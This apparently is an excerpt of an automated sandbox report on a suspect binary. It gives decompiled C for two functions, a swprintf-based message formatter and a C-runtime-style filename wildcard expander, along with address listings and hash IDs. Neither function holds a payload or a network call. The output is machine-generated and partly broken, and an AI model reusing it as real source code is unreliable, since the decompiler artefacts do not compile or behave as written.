                                                                                                                                                    Function 01220D97, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 17%
                                                                                                                                                    			E01220D97(intOrPtr* __ecx) {
				char _v516;
				signed int _t26;
				void* _t28;
				void* _t32;
				signed int _t33;
				signed int _t34;
				signed int _t35;
				signed int _t38;
				void* _t47;
				void* _t48;

				_t41 = __ecx;
				_t44 = __ecx;
				_t26 =  *(__ecx + 0x48);
				_t47 = _t26 - 0x6f;
				if(_t47 > 0) {
					__eflags = _t26 - 0x7d;
					if(_t26 == 0x7d) {
						E0122CBA4();
						_t28 = E0121DD11(_t41, 0x96);
						return E01229EB3( *0x1257448, E0121DD11(_t41, 0xc9), _t28, 0);
					}
				} else {
					if(_t47 == 0) {
						_push(0x456);
						L38:
						_push(E0121DD11(_t41));
						_push( *_t44);
						L19:
						_t32 = E0122ADC4();
						L11:
						return _t32;
					}
					_t48 = _t26 - 0x16;
					if(_t48 > 0) {
						__eflags = _t26 - 0x38;
						if(__eflags > 0) {
							_t33 = _t26 - 0x39;
							__eflags = _t33;
							if(_t33 == 0) {
								_push(0x8c);
								goto L38;
							}
							_t34 = _t33 - 1;
							__eflags = _t34;
							if(_t34 == 0) {
								_push(0x6f);
								goto L38;
							}
							_t35 = _t34 - 1;
							__eflags = _t35;
							if(_t35 == 0) {
								_push( *((intOrPtr*)(__ecx + 4)));
								_push(0x406);
								goto L13;
							}
							_t38 = _t35 - 9;
							__eflags = _t38;
							if(_t38 == 0) {
								_push(0x343);
								goto L38;
							}
							_t26 = _t38 - 1;
							__eflags = _t26;
							if(_t26 == 0) {
								_push(0x86);
								goto L38;
							}
						} else {
							if(__eflags == 0) {
								_push(0x67);
								goto L38;
							}
							_t26 = _t26 - 0x17;
							__eflags = _t26 - 0xb;
							if(_t26 <= 0xb) {
								switch( *((intOrPtr*)(_t26 * 4 +  &M0122105B))) {
									case 0:
										_push(0xde);
										goto L18;
									case 1:
										_push(0xe1);
										goto L18;
									case 2:
										_push(0xb4);
										goto L38;
									case 3:
										_push(0x69);
										goto L38;
									case 4:
										_push(0x6a);
										goto L38;
									case 5:
										_push( *((intOrPtr*)(__esi + 4)));
										_push(0x68);
										goto L13;
									case 6:
										_push(0x46f);
										goto L38;
									case 7:
										_push(0x470);
										goto L38;
									case 8:
										_push( *((intOrPtr*)(__esi + 4)));
										_push(0x471);
										goto L13;
									case 9:
										goto L61;
									case 0xa:
										_push( *((intOrPtr*)(__esi + 4)));
										_push(0x71);
										goto L13;
									case 0xb:
										E0121DD11(__ecx, 0xc8) =  &_v516;
										__eax = E01213FD6( &_v516, 0x100,  &_v516,  *((intOrPtr*)(__esi + 4)));
										_push( *((intOrPtr*)(__esi + 8)));
										__eax =  &_v516;
										_push( &_v516);
										return E0122ADC4( *__esi, L"%s: %s");
								}
							}
						}
					} else {
						if(_t48 == 0) {
							_push( *__ecx);
							_push(0xdd);
							L23:
							E0121DD11(_t41);
							L7:
							_push(0);
							L8:
							return E0122ADC4();
						}
						if(_t26 <= 0x15) {
							switch( *((intOrPtr*)(_t26 * 4 +  &M01221003))) {
								case 0:
									_push( *__esi);
									_push(L"%ls");
									_push(">");
									goto L8;
								case 1:
									_push( *__ecx);
									_push(L"%ls");
									goto L7;
								case 2:
									_push(0);
									__eax = E0122A578();
									goto L11;
								case 3:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x7b);
									goto L13;
								case 4:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x7a);
									goto L13;
								case 5:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x7c);
									goto L13;
								case 6:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0xca);
									goto L13;
								case 7:
									_push(0x70);
									L18:
									_push(E0121DD11(_t41));
									_push(0);
									goto L19;
								case 8:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x72);
									goto L13;
								case 9:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x78);
									goto L13;
								case 0xa:
									_push( *__esi);
									_push(0x85);
									goto L23;
								case 0xb:
									_push( *__esi);
									_push(0x204);
									goto L23;
								case 0xc:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x84);
									goto L13;
								case 0xd:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x83);
									goto L13;
								case 0xe:
									goto L61;
								case 0xf:
									_push( *((intOrPtr*)(__esi + 8)));
									_push( *((intOrPtr*)(__esi + 4)));
									__eax = E0121DD11(__ecx, 0xd2);
									return __eax;
								case 0x10:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x79);
									goto L13;
								case 0x11:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0xdc);
									L13:
									_push(E0121DD11(_t41));
									_push( *_t44);
									goto L8;
							}
						}
					}
				}
				L61:
				return _t26;
			}













                                                                                                                                                    0x01220d97
                                                                                                                                                    0x01220da1
                                                                                                                                                    0x01220da3
                                                                                                                                                    0x01220da6
                                                                                                                                                    0x01220da9
                                                                                                                                                    0x01220fd0
                                                                                                                                                    0x01220fd3
                                                                                                                                                    0x01220fd5
                                                                                                                                                    0x01220fe1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01220ff8
                                                                                                                                                    0x01220daf
                                                                                                                                                    0x01220daf
                                                                                                                                                    0x01220fc6
                                                                                                                                                    0x01220ef3
                                                                                                                                                    0x01220ef8
                                                                                                                                                    0x01220ef9
                                                                                                                                                    0x01220e36
                                                                                                                                                    0x01220e36
                                                                                                                                                    0x01220dff
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01220dff
                                                                                                                                                    0x01220db5
                                                                                                                                                    0x01220db8
                                                                                                                                                    0x01220eb8
                                                                                                                                                    0x01220ebb
                                                                                                                                                    0x01220f7b
                                                                                                                                                    0x01220f7b
                                                                                                                                                    0x01220f7e
                                                                                                                                                    0x01220fbc
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01220fbc
                                                                                                                                                    0x01220f80
                                                                                                                                                    0x01220f80
                                                                                                                                                    0x01220f83
                                                                                                                                                    0x01220fb5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01220fb5
                                                                                                                                                    0x01220f85
                                                                                                                                                    0x01220f85
                                                                                                                                                    0x01220f88
                                                                                                                                                    0x01220fa8
                                                                                                                                                    0x01220fab
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01220fab
                                                                                                                                                    0x01220f8a
                                                                                                                                                    0x01220f8a
                                                                                                                                                    0x01220f8d
                                                                                                                                                    0x01220f9e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01220f9e
                                                                                                                                                    0x01220f8f
                                                                                                                                                    0x01220f8f
                                                                                                                                                    0x01220f92
                                                                                                                                                    0x01220f94
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01220f94
                                                                                                                                                    0x01220ec1
                                                                                                                                                    0x01220ec1
                                                                                                                                                    0x01220f74
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01220f74
                                                                                                                                                    0x01220ec7
                                                                                                                                                    0x01220eca
                                                                                                                                                    0x01220ecd
                                                                                                                                                    0x01220ed3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01220eda
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01220ee4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01220eee
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01220f00
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01220f04
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01220f08
                                                                                                                                                    0x01220f0b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01220f12
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01220f19
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01220f20
                                                                                                                                                    0x01220f23
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01220f2d
                                                                                                                                                    0x01220f30
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01220f45
                                                                                                                                                    0x01220f51
                                                                                                                                                    0x01220f56
                                                                                                                                                    0x01220f59
                                                                                                                                                    0x01220f5f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01220ed3
                                                                                                                                                    0x01220ecd
                                                                                                                                                    0x01220dbe
                                                                                                                                                    0x01220dbe
                                                                                                                                                    0x01220eaf
                                                                                                                                                    0x01220eb1
                                                                                                                                                    0x01220e53
                                                                                                                                                    0x01220e53
                                                                                                                                                    0x01220ddb
                                                                                                                                                    0x01220ddb
                                                                                                                                                    0x01220ddd
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01220de2
                                                                                                                                                    0x01220dc7
                                                                                                                                                    0x01220dcd
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01220dea
                                                                                                                                                    0x01220dec
                                                                                                                                                    0x01220df1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01220dd4
                                                                                                                                                    0x01220dd6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01220df8
                                                                                                                                                    0x01220dfa
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01220e05
                                                                                                                                                    0x01220e08
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01220e14
                                                                                                                                                    0x01220e17
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01220e1b
                                                                                                                                                    0x01220e1e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01220e22
                                                                                                                                                    0x01220e25
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01220e2c
                                                                                                                                                    0x01220e2e
                                                                                                                                                    0x01220e33
                                                                                                                                                    0x01220e34
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01220e3e
                                                                                                                                                    0x01220e41
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01220e45
                                                                                                                                                    0x01220e48
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01220e4c
                                                                                                                                                    0x01220e4e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01220e5b
                                                                                                                                                    0x01220e5d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01220e64
                                                                                                                                                    0x01220e67
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01220e6e
                                                                                                                                                    0x01220e71
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01220e78
                                                                                                                                                    0x01220e7b
                                                                                                                                                    0x01220e83
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01220e98
                                                                                                                                                    0x01220e9b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01220ea2
                                                                                                                                                    0x01220ea5
                                                                                                                                                    0x01220e0a
                                                                                                                                                    0x01220e0f
                                                                                                                                                    0x01220e10
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01220dcd
                                                                                                                                                    0x01220dc7
                                                                                                                                                    0x01220db8
                                                                                                                                                    0x01221001
                                                                                                                                                    0x01221001

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _swprintf
                                                                                                                                                    • String ID: %ls$%s: %s
                                                                                                                                                    • API String ID: 589789837-2259941744
                                                                                                                                                    • Opcode ID: 11a689c951db53b38b14e99e684b5e36f0e37f16c8592b73dc85a21659fb8652
                                                                                                                                                    • Instruction ID: 9aa210f3064d9ff081b927fad44e6c0a940ff0b067ad995419936105dd6268b4
                                                                                                                                                    • Opcode Fuzzy Hash: 11a689c951db53b38b14e99e684b5e36f0e37f16c8592b73dc85a21659fb8652
                                                                                                                                                    • Instruction Fuzzy Hash: E351B8326F8336FBEA211AA48D8BF3F7A66BB14B00F004506F786788D0CDE551905A5E
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0123A798, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 73%
                                                                                                                                                    			E0123A798(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				char _v6;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v36;
				intOrPtr* _v64;
				intOrPtr _v96;
				intOrPtr* _v100;
				CHAR* _v104;
				signed int _v116;
				char _v290;
				signed int _v291;
				struct _WIN32_FIND_DATAA _v336;
				union _FINDEX_INFO_LEVELS _v340;
				signed int _v344;
				signed int _v348;
				intOrPtr _v440;
				intOrPtr* _t80;
				signed int _t82;
				signed int _t87;
				signed int _t91;
				signed int _t93;
				signed int _t95;
				signed int _t96;
				signed int _t100;
				signed int _t103;
				signed int _t108;
				signed int _t111;
				intOrPtr _t113;
				signed char _t115;
				union _FINDEX_INFO_LEVELS _t123;
				signed int _t128;
				signed int _t131;
				void* _t137;
				void* _t139;
				signed int _t140;
				signed int _t143;
				signed int _t145;
				signed int _t147;
				signed int* _t148;
				signed int _t151;
				void* _t154;
				CHAR* _t155;
				char _t158;
				char _t160;
				intOrPtr* _t163;
				void* _t164;
				intOrPtr* _t165;
				signed int _t167;
				void* _t169;
				intOrPtr* _t170;
				signed int _t174;
				signed int _t178;
				signed int _t179;
				intOrPtr* _t184;
				void* _t193;
				intOrPtr _t194;
				signed int _t196;
				signed int _t197;
				signed int _t199;
				signed int _t200;
				signed int _t202;
				union _FINDEX_INFO_LEVELS _t203;
				signed int _t208;
				signed int _t210;
				signed int _t211;
				void* _t213;
				intOrPtr _t214;
				void* _t215;
				signed int _t219;
				void* _t221;
				signed int _t222;
				void* _t223;
				void* _t224;
				void* _t225;
				signed int _t226;
				void* _t227;
				void* _t228;

				_t80 = _a8;
				_t224 = _t223 - 0x20;
				if(_t80 != 0) {
					_t208 = _a4;
					_t160 = 0;
					 *_t80 = 0;
					_t199 = 0;
					_t151 = 0;
					_v36 = 0;
					_v336.cAlternateFileName = 0;
					_v28 = 0;
					__eflags =  *_t208;
					if( *_t208 == 0) {
						L9:
						_v12 = _v12 & 0x00000000;
						_t82 = _t151 - _t199;
						_v8 = _t160;
						_t191 = (_t82 >> 2) + 1;
						__eflags = _t151 - _t199;
						_v16 = (_t82 >> 2) + 1;
						asm("sbb esi, esi");
						_t210 =  !_t208 & _t82 + 0x00000003 >> 0x00000002;
						__eflags = _t210;
						if(_t210 != 0) {
							_t197 = _t199;
							_t158 = _t160;
							do {
								_t184 =  *_t197;
								_t17 = _t184 + 1; // 0x1
								_v8 = _t17;
								do {
									_t143 =  *_t184;
									_t184 = _t184 + 1;
									__eflags = _t143;
								} while (_t143 != 0);
								_t158 = _t158 + 1 + _t184 - _v8;
								_t197 = _t197 + 4;
								_t145 = _v12 + 1;
								_v12 = _t145;
								__eflags = _t145 - _t210;
							} while (_t145 != _t210);
							_t191 = _v16;
							_v8 = _t158;
							_t151 = _v336.cAlternateFileName;
						}
						_t211 = E0123777C(_t191, _v8, 1);
						_t225 = _t224 + 0xc;
						__eflags = _t211;
						if(_t211 != 0) {
							_t87 = _t211 + _v16 * 4;
							_v20 = _t87;
							_t192 = _t87;
							_v16 = _t87;
							__eflags = _t199 - _t151;
							if(_t199 == _t151) {
								L23:
								_t200 = 0;
								__eflags = 0;
								 *_a8 = _t211;
								goto L24;
							} else {
								_t93 = _t211 - _t199;
								__eflags = _t93;
								_v24 = _t93;
								do {
									_t163 =  *_t199;
									_v12 = _t163 + 1;
									do {
										_t95 =  *_t163;
										_t163 = _t163 + 1;
										__eflags = _t95;
									} while (_t95 != 0);
									_t164 = _t163 - _v12;
									_t35 = _t164 + 1; // 0x1
									_t96 = _t35;
									_push(_t96);
									_v12 = _t96;
									_t100 = E0123E6E1(_t164, _t192, _v20 - _t192 + _v8,  *_t199);
									_t225 = _t225 + 0x10;
									__eflags = _t100;
									if(_t100 != 0) {
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										E012386C9();
										asm("int3");
										_t221 = _t225;
										_push(_t164);
										_t165 = _v64;
										_t47 = _t165 + 1; // 0x1
										_t193 = _t47;
										do {
											_t103 =  *_t165;
											_t165 = _t165 + 1;
											__eflags = _t103;
										} while (_t103 != 0);
										_push(_t199);
										_t202 = _a8;
										_t167 = _t165 - _t193 + 1;
										_v12 = _t167;
										__eflags = _t167 - (_t103 | 0xffffffff) - _t202;
										if(_t167 <= (_t103 | 0xffffffff) - _t202) {
											_push(_t151);
											_t50 = _t202 + 1; // 0x1
											_t154 = _t50 + _t167;
											_t213 = E01238429(_t167, _t154, 1);
											_t169 = _t211;
											__eflags = _t202;
											if(_t202 == 0) {
												L34:
												_push(_v12);
												_t154 = _t154 - _t202;
												_t108 = E0123E6E1(_t169, _t213 + _t202, _t154, _v0);
												_t226 = _t225 + 0x10;
												__eflags = _t108;
												if(__eflags != 0) {
													goto L37;
												} else {
													_t137 = E0123AB67(_a12, _t193, __eflags, _t213);
													E0123835E(0);
													_t139 = _t137;
													goto L36;
												}
											} else {
												_push(_t202);
												_t140 = E0123E6E1(_t169, _t213, _t154, _a4);
												_t226 = _t225 + 0x10;
												__eflags = _t140;
												if(_t140 != 0) {
													L37:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E012386C9();
													asm("int3");
													_push(_t221);
													_t222 = _t226;
													_t227 = _t226 - 0x150;
													_t111 =  *0x124d668; // 0x6c4f95b1
													_v116 = _t111 ^ _t222;
													_t170 = _v100;
													_push(_t154);
													_t155 = _v104;
													_push(_t213);
													_t214 = _v96;
													_push(_t202);
													_v440 = _t214;
													while(1) {
														__eflags = _t170 - _t155;
														if(_t170 == _t155) {
															break;
														}
														_t113 =  *_t170;
														__eflags = _t113 - 0x2f;
														if(_t113 != 0x2f) {
															__eflags = _t113 - 0x5c;
															if(_t113 != 0x5c) {
																__eflags = _t113 - 0x3a;
																if(_t113 != 0x3a) {
																	_t170 = E0123E730(_t155, _t170);
																	continue;
																}
															}
														}
														break;
													}
													_t194 =  *_t170;
													__eflags = _t194 - 0x3a;
													if(_t194 != 0x3a) {
														L47:
														_t203 = 0;
														__eflags = _t194 - 0x2f;
														if(_t194 == 0x2f) {
															L51:
															_t115 = 1;
															__eflags = 1;
														} else {
															__eflags = _t194 - 0x5c;
															if(_t194 == 0x5c) {
																goto L51;
															} else {
																__eflags = _t194 - 0x3a;
																if(_t194 == 0x3a) {
																	goto L51;
																} else {
																	_t115 = 0;
																}
															}
														}
														asm("sbb eax, eax");
														_v344 =  ~(_t115 & 0x000000ff) & _t170 - _t155 + 0x00000001;
														E0122F1A0(_t203,  &_v336, _t203, 0x140);
														_t228 = _t227 + 0xc;
														_t215 = FindFirstFileExA(_t155, _t203,  &_v336, _t203, _t203, _t203);
														_t123 = _v340;
														__eflags = _t215 - 0xffffffff;
														if(_t215 != 0xffffffff) {
															_t174 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
															__eflags = _t174;
															_v348 = _t174 >> 2;
															do {
																__eflags = _v336.cFileName - 0x2e;
																if(_v336.cFileName != 0x2e) {
																	L64:
																	_push(_t123);
																	_push(_v344);
																	_t123 =  &(_v336.cFileName);
																	_push(_t155);
																	_push(_t123);
																	L28();
																	_t228 = _t228 + 0x10;
																	__eflags = _t123;
																	if(_t123 != 0) {
																		goto L54;
																	} else {
																		goto L65;
																	}
																} else {
																	_t178 = _v291;
																	__eflags = _t178;
																	if(_t178 == 0) {
																		goto L65;
																	} else {
																		__eflags = _t178 - 0x2e;
																		if(_t178 != 0x2e) {
																			goto L64;
																		} else {
																			__eflags = _v290;
																			if(_v290 == 0) {
																				goto L65;
																			} else {
																				goto L64;
																			}
																		}
																	}
																}
																goto L58;
																L65:
																_t128 = FindNextFileA(_t215,  &_v336);
																__eflags = _t128;
																_t123 = _v340;
															} while (_t128 != 0);
															_t195 =  *_t123;
															_t179 = _v348;
															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
															__eflags = _t179 - _t131;
															if(_t179 != _t131) {
																E012358F0(_t155, _t203, _t215, _t195 + _t179 * 4, _t131 - _t179, 4, E0123A780);
															}
														} else {
															_push(_t123);
															_push(_t203);
															_push(_t203);
															_push(_t155);
															L28();
															L54:
															_t203 = _t123;
														}
														__eflags = _t215 - 0xffffffff;
														if(_t215 != 0xffffffff) {
															FindClose(_t215);
														}
													} else {
														__eflags = _t170 -  &(_t155[1]);
														if(_t170 ==  &(_t155[1])) {
															goto L47;
														} else {
															_push(_t214);
															_push(0);
															_push(0);
															_push(_t155);
															L28();
														}
													}
													L58:
													__eflags = _v16 ^ _t222;
													return E0122EA8A(_v16 ^ _t222);
												} else {
													goto L34;
												}
											}
										} else {
											_t139 = 0xc;
											L36:
											return _t139;
										}
									} else {
										goto L22;
									}
									goto L68;
									L22:
									_t196 = _v16;
									 *((intOrPtr*)(_v24 + _t199)) = _t196;
									_t199 = _t199 + 4;
									_t192 = _t196 + _v12;
									_v16 = _t196 + _v12;
									__eflags = _t199 - _t151;
								} while (_t199 != _t151);
								goto L23;
							}
						} else {
							_t200 = _t199 | 0xffffffff;
							L24:
							E0123835E(0);
							goto L25;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t160;
							_t147 = E0123E6F0( *_t208,  &_v8);
							__eflags = _t147;
							if(_t147 != 0) {
								_push( &_v36);
								_push(_t147);
								_push( *_t208);
								L38();
								_t224 = _t224 + 0xc;
							} else {
								_t147 =  &_v36;
								_push(_t147);
								_push(0);
								_push(0);
								_push( *_t208);
								L28();
								_t224 = _t224 + 0x10;
							}
							_t200 = _t147;
							__eflags = _t200;
							if(_t200 != 0) {
								break;
							}
							_t208 = _t208 + 4;
							_t160 = 0;
							__eflags =  *_t208;
							if( *_t208 != 0) {
								continue;
							} else {
								_t151 = _v336.cAlternateFileName;
								_t199 = _v36;
								goto L9;
							}
							goto L68;
						}
						L25:
						E0123AB42( &_v36);
						_t91 = _t200;
						goto L26;
					}
				} else {
					_t148 = E012387DA();
					_t219 = 0x16;
					 *_t148 = _t219;
					E012386B9();
					_t91 = _t219;
					L26:
					return _t91;
				}
				L68:
			}





















































































                                                                                                                                                    0x0123a79d
                                                                                                                                                    0x0123a7a0
                                                                                                                                                    0x0123a7a6
                                                                                                                                                    0x0123a7be
                                                                                                                                                    0x0123a7c1
                                                                                                                                                    0x0123a7c5
                                                                                                                                                    0x0123a7c7
                                                                                                                                                    0x0123a7c9
                                                                                                                                                    0x0123a7cb
                                                                                                                                                    0x0123a7ce
                                                                                                                                                    0x0123a7d1
                                                                                                                                                    0x0123a7d4
                                                                                                                                                    0x0123a7d6
                                                                                                                                                    0x0123a82e
                                                                                                                                                    0x0123a82e
                                                                                                                                                    0x0123a834
                                                                                                                                                    0x0123a836
                                                                                                                                                    0x0123a841
                                                                                                                                                    0x0123a845
                                                                                                                                                    0x0123a847
                                                                                                                                                    0x0123a84a
                                                                                                                                                    0x0123a84e
                                                                                                                                                    0x0123a84e
                                                                                                                                                    0x0123a850
                                                                                                                                                    0x0123a852
                                                                                                                                                    0x0123a854
                                                                                                                                                    0x0123a856
                                                                                                                                                    0x0123a856
                                                                                                                                                    0x0123a858
                                                                                                                                                    0x0123a85b
                                                                                                                                                    0x0123a85e
                                                                                                                                                    0x0123a85e
                                                                                                                                                    0x0123a860
                                                                                                                                                    0x0123a861
                                                                                                                                                    0x0123a861
                                                                                                                                                    0x0123a86c
                                                                                                                                                    0x0123a86e
                                                                                                                                                    0x0123a871
                                                                                                                                                    0x0123a872
                                                                                                                                                    0x0123a875
                                                                                                                                                    0x0123a875
                                                                                                                                                    0x0123a879
                                                                                                                                                    0x0123a87c
                                                                                                                                                    0x0123a87f
                                                                                                                                                    0x0123a87f
                                                                                                                                                    0x0123a88d
                                                                                                                                                    0x0123a88f
                                                                                                                                                    0x0123a892
                                                                                                                                                    0x0123a894
                                                                                                                                                    0x0123a89e
                                                                                                                                                    0x0123a8a1
                                                                                                                                                    0x0123a8a4
                                                                                                                                                    0x0123a8a6
                                                                                                                                                    0x0123a8a9
                                                                                                                                                    0x0123a8ab
                                                                                                                                                    0x0123a8fb
                                                                                                                                                    0x0123a8fe
                                                                                                                                                    0x0123a8fe
                                                                                                                                                    0x0123a900
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123a8ad
                                                                                                                                                    0x0123a8af
                                                                                                                                                    0x0123a8af
                                                                                                                                                    0x0123a8b1
                                                                                                                                                    0x0123a8b4
                                                                                                                                                    0x0123a8b4
                                                                                                                                                    0x0123a8b9
                                                                                                                                                    0x0123a8bc
                                                                                                                                                    0x0123a8bc
                                                                                                                                                    0x0123a8be
                                                                                                                                                    0x0123a8bf
                                                                                                                                                    0x0123a8bf
                                                                                                                                                    0x0123a8c3
                                                                                                                                                    0x0123a8c6
                                                                                                                                                    0x0123a8c6
                                                                                                                                                    0x0123a8c9
                                                                                                                                                    0x0123a8cc
                                                                                                                                                    0x0123a8d9
                                                                                                                                                    0x0123a8de
                                                                                                                                                    0x0123a8e1
                                                                                                                                                    0x0123a8e3
                                                                                                                                                    0x0123a91d
                                                                                                                                                    0x0123a91e
                                                                                                                                                    0x0123a91f
                                                                                                                                                    0x0123a920
                                                                                                                                                    0x0123a921
                                                                                                                                                    0x0123a922
                                                                                                                                                    0x0123a927
                                                                                                                                                    0x0123a92b
                                                                                                                                                    0x0123a92d
                                                                                                                                                    0x0123a92e
                                                                                                                                                    0x0123a931
                                                                                                                                                    0x0123a931
                                                                                                                                                    0x0123a934
                                                                                                                                                    0x0123a934
                                                                                                                                                    0x0123a936
                                                                                                                                                    0x0123a937
                                                                                                                                                    0x0123a937
                                                                                                                                                    0x0123a940
                                                                                                                                                    0x0123a941
                                                                                                                                                    0x0123a944
                                                                                                                                                    0x0123a947
                                                                                                                                                    0x0123a94a
                                                                                                                                                    0x0123a94c
                                                                                                                                                    0x0123a953
                                                                                                                                                    0x0123a955
                                                                                                                                                    0x0123a958
                                                                                                                                                    0x0123a962
                                                                                                                                                    0x0123a965
                                                                                                                                                    0x0123a966
                                                                                                                                                    0x0123a968
                                                                                                                                                    0x0123a97c
                                                                                                                                                    0x0123a97c
                                                                                                                                                    0x0123a97f
                                                                                                                                                    0x0123a989
                                                                                                                                                    0x0123a98e
                                                                                                                                                    0x0123a991
                                                                                                                                                    0x0123a993
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123a995
                                                                                                                                                    0x0123a999
                                                                                                                                                    0x0123a9a2
                                                                                                                                                    0x0123a9a8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123a9ab
                                                                                                                                                    0x0123a96a
                                                                                                                                                    0x0123a96a
                                                                                                                                                    0x0123a970
                                                                                                                                                    0x0123a975
                                                                                                                                                    0x0123a978
                                                                                                                                                    0x0123a97a
                                                                                                                                                    0x0123a9b1
                                                                                                                                                    0x0123a9b3
                                                                                                                                                    0x0123a9b4
                                                                                                                                                    0x0123a9b5
                                                                                                                                                    0x0123a9b6
                                                                                                                                                    0x0123a9b7
                                                                                                                                                    0x0123a9b8
                                                                                                                                                    0x0123a9bd
                                                                                                                                                    0x0123a9c0
                                                                                                                                                    0x0123a9c1
                                                                                                                                                    0x0123a9c3
                                                                                                                                                    0x0123a9c9
                                                                                                                                                    0x0123a9d0
                                                                                                                                                    0x0123a9d3
                                                                                                                                                    0x0123a9d6
                                                                                                                                                    0x0123a9d7
                                                                                                                                                    0x0123a9da
                                                                                                                                                    0x0123a9db
                                                                                                                                                    0x0123a9de
                                                                                                                                                    0x0123a9df
                                                                                                                                                    0x0123aa00
                                                                                                                                                    0x0123aa00
                                                                                                                                                    0x0123aa02
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123a9e7
                                                                                                                                                    0x0123a9e9
                                                                                                                                                    0x0123a9eb
                                                                                                                                                    0x0123a9ed
                                                                                                                                                    0x0123a9ef
                                                                                                                                                    0x0123a9f1
                                                                                                                                                    0x0123a9f3
                                                                                                                                                    0x0123a9fe
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123a9fe
                                                                                                                                                    0x0123a9f3
